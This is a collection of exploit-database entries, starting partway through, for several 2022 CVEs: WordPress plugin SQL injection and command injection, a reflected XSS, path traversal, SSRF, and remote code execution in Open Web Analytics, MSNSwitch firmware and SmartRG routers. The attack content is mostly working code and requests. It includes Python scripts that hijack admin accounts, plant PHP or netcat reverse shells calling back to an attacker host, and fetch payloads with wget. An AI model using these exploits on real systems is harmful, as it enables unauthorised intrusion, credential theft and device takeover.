COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4 --- ```

# Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi # Date: 14-08-2022 # Exploit Author: Rizacan Tufan # Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated # Software Link: https://wordpress.org/plugins/zephyr-project-manager/ # Vendor Homepage: https://zephyr-one.com/ # Version: 3.2.42 # Tested on: Windows, Linux # CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c) # Description Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks. It has been determined that the data coming from the input field in most places throughout the application are used in=20 the query without any sanitize and validation. The details of the discovery are given below. # Proof of Concept (PoC)=20 The details of the various SQL Injection on the application are given below. ## Endpoint of Get Project Data. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projects Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: project_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7 Type: time-based blind Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP) Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7 Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7 --- ## Endpoint of Get Task Data. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 51 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: task_id (POST) Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 --- ## Endpoint of New Task. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 337 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: task_project (POST) Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 ---

# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS) # Date: 28/08/2022 # Exploit Author: Ashkan Moghaddas # Vendor Homepage: https://testa.cc # Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip # Version: 3.5.1 # Tested on: Windows/Linux # Proof of Concept: # 1- Install Testa 3.5.1 # 2- Go to https://localhost.com/login.php?redirect=XXXX # 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E # 4- XSS has been triggered. # Go to this url " https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E " XSS will trigger.

# Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated) # Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/" # Date: Thursday, September 1, 2022 # Exploit Author: ABDO10 # Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/ # Software Link: https://github.com/orangelabweb/imagemagick-engine/ # Version: <= 1.7.4 # Tested on: windows 10 -- vulnerable section https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529 -- payload on windows: d&calc.exe&anything -- on unix : notify-send "done" -- exploit : GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload] HTTP/1.1 Host: localhost Cookie: wordpress_sec_xx=; wp-settings-time-1=; wordpress_test_cookie=; wordpress_logged_in_xx=somestuff User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine X-Requested-With: XMLHttpRequest Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close

# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE) # Date: 2022-08-30 # Exploit Author: Jacob Ebben # Vendor Homepage: https://www.openwebanalytics.com/ # Software Link: https://github.com/Open-Web-Analytics # Version: <1.7.4 # Tested on: Linux # CVE : CVE-2022-24637 import argparse import requests import base64 import re import random import string import hashlib from termcolor import colored def print_message(message, type): if type == 'SUCCESS': print('[' + colored('SUCCESS', 'green') + '] ' + message) elif type == 'INFO': print('[' + colored('INFO', 'blue') + '] ' + message) elif type == 'WARNING': print('[' + colored('WARNING', 'yellow') + '] ' + message) elif type == 'ALERT': print('[' + colored('ALERT', 'yellow') + '] ' + message) elif type == 'ERROR': print('[' + colored('ERROR', 'red') + '] ' + message) def get_normalized_url(url): if url[-1] != '/': url += '/' if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://': url = "http://" + url return url def get_proxy_protocol(url): if url[0:8].lower() == 'https://': return 'https' return 'http' def get_random_string(length): chars = string.ascii_letters + string.digits return ''.join(random.choice(chars) for i in range(length)) def get_cache_content(cache_raw): regex_cache_base64 = r'\*(\w*)\*' regex_result = re.search(regex_cache_base64, cache_raw) if not regex_result: print_message('The provided URL does not appear to be vulnerable ...', "ERROR") exit() else: cache_base64 = regex_result.group(1) return base64.b64decode(cache_base64).decode("ascii") def get_cache_username(cache): regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"' return re.search(regex_cache_username, cache).group(1) def get_cache_temppass(cache): regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"' return re.search(regex_cache_temppass, cache).group(1) def get_update_nonce(url): try: update_nonce_request = session.get(url, proxies=proxies) regex_update_nonce = r'owa_nonce" value="(\w*)"' update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1) except Exception as e: print_message('An error occurred when attempting to update config!', "ERROR") print(e) exit() else: return update_nonce parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)') parser.add_argument('TARGET', type=str, help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)') parser.add_argument('ATTACKER_IP', type=str, help='Address for reverse shell listener on attacking machine') parser.add_argument('ATTACKER_PORT', type=str, help='Port for reverse shell listener on attacking machine') parser.add_argument('-u', '--username', default="admin", type=str, help='The username to exploit (Default: admin)') parser.add_argument('-p','--password', default=get_random_string(32), type=str, help='The new password for the exploited user') parser.add_argument('-P','--proxy', type=str, help='HTTP proxy address (Example: http://127.0.0.1:8080/)') parser.add_argument('-c', '--check', action='store_true', help='Check vulnerability without exploitation') args = parser.parse_args() base_url = get_normalized_url(args.TARGET) login_url = base_url + "index.php?owa_do=base.loginForm" password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry" update_config_url = base_url + "index.php?owa_do=base.optionsGeneral" username = args.username new_password = args.password reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>' shell_filename = get_random_string(8) + '.php' shell_url = base_url + 'owa-data/caches/' + shell_filename if args.proxy: proxy_url = get_normalized_url(args.proxy) proxy_protocol = get_proxy_protocol(proxy_url) proxies = { proxy_protocol: proxy_url } else: proxies = {} session = requests.Session() try: mainpage_request = session.get(base_url, proxies=proxies) except Exception as e: print_message('Could not connect to "' + base_url, "ERROR") exit() else: print_message('Connected to "' + base_url + '" successfully!', "SUCCESS") if 'Open Web Analytics' not in mainpage_request.text: print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING") elif 'version=1.7.3' not in mainpage_request.text: print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING") else: print_message('The webserver indicates a vulnerable version!', "ALERT") try: data = { "owa_user_id": username, "owa_password": username, "owa_action": "base.login" } session.post(login_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred during the login attempt!', "ERROR") print(e) exit() else: print_message('Attempting to generate cache for "' + username + '" user', "INFO") print_message('Attempting to find cache of "' + username + '" user', "INFO") found = False for key in range(100): user_id = 'user_id' + str(key) userid_hash = hashlib.md5(user_id.encode()).hexdigest() filename = userid_hash + '.php' cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename cache_request = requests.get(cache_url, proxies=proxies) if cache_request.status_code != 200: continue; cache_raw = cache_request.text cache = get_cache_content(cache_raw) cache_username = get_cache_username(cache) if cache_username != username: print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO") continue; else: found = True break if not found: print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR") exit() cache_temppass = get_cache_temppass(cache) print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO") if args.check: print_message('The system appears to be vulnerable!', "ALERT") exit() try: data = { "owa_password": new_password, "owa_password2": new_password, "owa_k": cache_temppass, "owa_action": "base.usersChangePassword" } session.post(password_reset_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred when changing the user password!', "ERROR") print(e) exit() else: print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO") try: data = { "owa_user_id": username, "owa_password": new_password, "owa_action": "base.login" } session.post(login_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred during the login attempt!', "ERROR") print(e) exit() else: print_message('Logged in as "' + username + '" user', "SUCCESS") nonce = get_update_nonce(update_config_url) try: log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename data = { "owa_nonce": nonce, "owa_action": "base.optionsUpdate", "owa_config[base.error_log_file]": log_location, "owa_config[base.error_log_level]": 2 } session.post(update_config_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred when attempting to update config!', "ERROR") print(e) exit() else: print_message('Creating log file', "INFO") nonce = get_update_nonce(update_config_url) try: data = { "owa_nonce": nonce, "owa_action": "base.optionsUpdate", "owa_config[shell]": reverse_shell } session.post(update_config_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred when attempting to update config!', "ERROR") print(e) exit() else: print_message('Wrote payload to log file', "INFO") try: session.get(shell_url, proxies=proxies) except Exception as e: print(e) else: print_message('Triggering payload! Check your listener!', "SUCCESS") print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")

Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal Exploit Author: Jens Regel (CRISEC IT-Security) Date: 11/11/2022 CVE: CVE-2022-23854 Version: Access Anywhere Secure Gateway versions 2020 R2 and older Proof of Concept: GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1 HTTP/1.1 200 OK Server: EricomSecureGateway/8.4.0.26844.* (..) ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1

Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE) Google Dork: n/a Date:9/1/2022 Exploit Author: Eli Fulkerson Vendor Homepage: https://www.msnswitch.com/ Version: MNT.2408 Tested on: MNT.2408 firmware CVE: CVE-2022-32429 #!/usr/bin/python3 """ POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408. Configuration dump only requires HTTP access. Full RCE requires you to be on the same subnet as the device. """ import requests import sys import urllib.parse import readline import random import string # listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST LISTENER_HOST = "192.168.EDIT.ME" LISTENER_PORT = 3434 # target msnswitch TARGET="192.168.EDIT.ME2" PORT=80 USERNAME = None PASSWORD = None """ First vulnerability, unauthenticated configuration/credential dump """ if USERNAME == None or PASSWORD == None: # lets just ask hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh" session = requests.session() data = session.get(hack_url) for each in data.text.split('\n'): key = None val = None try: key = each.strip().split('=')[0] val = each.strip().split('=')[1] except: pass if key == "Account1": USERNAME = val if key == "Password1": PASSWORD = val """ Second vulnerability, authenticated command execution This only works on the local lan. for full reverse shell, modify and upload netcat busybox shell script to /tmp: shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox """ session = requests.session() # initial login, establishes our Cookie burp0_url = f"http://{TARGET}:{PORT}/goform/login" burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD} session.post(burp0_url, headers=burp0_headers, data=burp0_data) # get our csrftoken burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp" data = session.get(burp0_url) csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0] while True: CMD = input('x:') CMD_u = urllib.parse.quote_plus(CMD) filename = ''.join(random.choice(string.ascii_letters) for _ in range(25)) try: hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}" session.get(hack_url, timeout=0.01) except requests.exceptions.ReadTimeout: pass

# Exploit Title: IOTransfer V4 - Unquoted Service Path # Exploit Author: BLAY ABU SAFIAN (Inveteck Global) # Discovery Date: 2022-28-07 # Vendor Homepage: http://www.iobit.com/en/index.php # Software Link: https://iotransfer.itopvpn.com/download/ # Tested Version: V4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe Auto C:\>sc qc IOTUpdaterSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IOTUpdaterSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IOTransfer Updater DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows Server 2019 Standard Evaluation OS Version: 10.0.17763 N/A Build 17763 OS Manufacturer: Microsoft Corporation

#Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery) #Exploit Author: Emir Polat #Vendor Homepage: https://github.com/opencv/cvat #Version: < 2.0.0 #Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64) #CVE: CVE-2022-31188 # Description: #CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. #Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. POST /api/v1/tasks/2/data HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: application/json, text/plain, */* Accept-Language:en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Token 06d88f739a10c7533991d8010761df721b790b7 X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436 Content-Length: 569 Origin: http://localhost:8080 Connection: close Referer:http://localhost:8080/tasks/create Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name="remote files[0]" http://localhost:8081 -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name=" image quality" 170 -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name="use zip chunks" true -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name="use cache" true -----------------------------251652214142138553464236533436--

# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution) # Date: 13/06/2022 # Exploit Author: Yerodin Richards # Vendor Homepage: https://adtran.com # Version: 2.5.15 / 2.6.13 (confirmed) # Tested on: SR506n (2.5.15) & SR510n (2.6.13) # CVE : CVE-2022-37661 import requests from subprocess import Popen, PIPE router_host =3D "http://192.168.1.1" authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D" lhost =3D "lo" lport =3D 80 payload_port =3D 81 def main(): e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm= p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE) Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout) send_payload(f"|nc {lhost} {payload_port}|sh") print("done.. check shell") def get_session(): url =3D router_host + "/admin/ping.html" headers =3D {"Authorization": "Basic {}".format(authorization_header)} r =3D requests.get(url, headers=3Dheaders).text i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D") s =3D "" while r[i] !=3D "'": s =3D s + r[i] i =3D i + 1 return s def send_payload(payload): print(payload) url =3D router_host + "/admin/pingHost.cmd" headers =3D {"Authorization": "Basic {}".format(authorization_header)} params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"= : get_session()} requests.get(url, headers=3Dheaders, params=3Dparams).text main()